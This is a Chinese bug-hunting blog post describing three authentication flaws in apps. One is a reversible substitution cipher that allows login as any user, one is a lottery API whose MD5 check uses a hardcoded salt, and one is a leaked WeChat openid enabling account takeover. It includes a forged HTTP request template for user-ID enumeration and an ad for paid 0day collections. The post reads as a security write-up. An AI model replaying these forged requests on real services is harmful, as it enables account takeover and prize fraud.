某天，看到出了一个每天阅读30分钟可以获得会员的活动，抄起fiddler准备写个脚本每天挂机签到。一点点开始找签到的数据包，发现是跳转认证到活动域名，于是逆推看看咋授权的，cookie字段大概10几个，特别长，不知道哪个才是有效的身份凭据，一点点删，一点点排除...然后莫名其妙发现cookie全删了，请求还是成功，返回已经签到而不是未登录，又看了请求头其他键值，都是基本的Referer，User-Agent之类的，离谱！

作为一个理工男，才不信那些玄学，最后把目光放到提交数据里(很长,也是一点点删一点点排除)最后删除一个四不像的字段，终于响应状态异常，仔细端详起来。

stalp=cettpjccseh

stalp=cetggggqqqq

但又好像没变？还是11位 还是c开头 ，这时候大胆的猜测是自写的替换规律。最后输入一个18234567900之类的手机号(包含0-9)得到全部数字对应的字母。最终实现了任意用户登录。

app首页一个抽奖活动，发现是内置的h5，抓包分析

POST /activity/rewards/saveLotteryRecord HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonAccept: */*Accept-Language: zh-cnUser-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)Host: xxxxContent-Length: 150{"secretKey":"e9469538b0623783f38c585821459454","uId":6,"rId":848638701568,"nm":"青春版抽奖","encryptStr":"6a999ce99caae26dd4343224ecbbb61b"}

发现secretKey固定，uid为用户uid，rid猜测跟奖品有关，encryptStr md5校验并且无身份认证，cookie session等，可猜测可以进行uid遍历

因为是内嵌的h5 直接浏览器打开 根据js代码分析，得到校验md5算法。

由此可以进行uid遍历，伪造请求包

POST /activity/rewards/saveLotteryRecord HTTP/1.1Connection: Keep-AliveContent-Type: application/jsonAccept: */*Accept-Language: zh-cnUser-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)Host: xxxContent-Length: 150{"secretKey":"e9469538b0623783f38c585821459454","uId":uid,"rId":963819728903,"nm":"青春版抽奖","encryptStr":"md5（e9469538b0623783f38c585821459454+uid+963819728903+xhs20190327171010xmtzx）"}

攻防演练遇到的因为没办法拿权限，没提交没截图，单纯看了一下，目前关掉了，只能口述了。严格来说是越权，因为openid没办法预测。

打开授权登录后返回微信的openid 发现一成不变，于是只要获取他人openid即可。想了想跟其他用户有交互的位置  最终在访问评论页面的可抓到别人的openid。在burp开启匹配和替换 设置规则替换成其他openid即可。

这里之所以提到该案例 是想提醒师傅们，一些有凭据的不可预测的 不要认为没有办法，因为可能会在某处泄露。

        类似跳转认证处(某通某行) 解密校验处,大多存在问题，平时的积累也很重要很多时候惊喜总在不经意间发生，但这需要坚持不懈的努力和细心，生活亦如此。喜欢的师傅可以点赞转发支持一下谢谢！

       如果你想学习更多渗透挖洞技术欢迎加入我们内部星球可获得内部工具字典和享受内部资源，包含网上一些付费工具。详情直接点击下方链接进入了解，需要加入的直接点击下方链接了解即可，觉得价格高的师傅可后台回复" 星球 "有优惠券名额有限先到先得！内部包含网上需付费的0day/1day漏洞库，后续资源会更丰富在加入还是低价！（星球内容每周一至周五更新）

👉点击了解-->>内部VIP知识星球福利介绍V1.3版本-星球介绍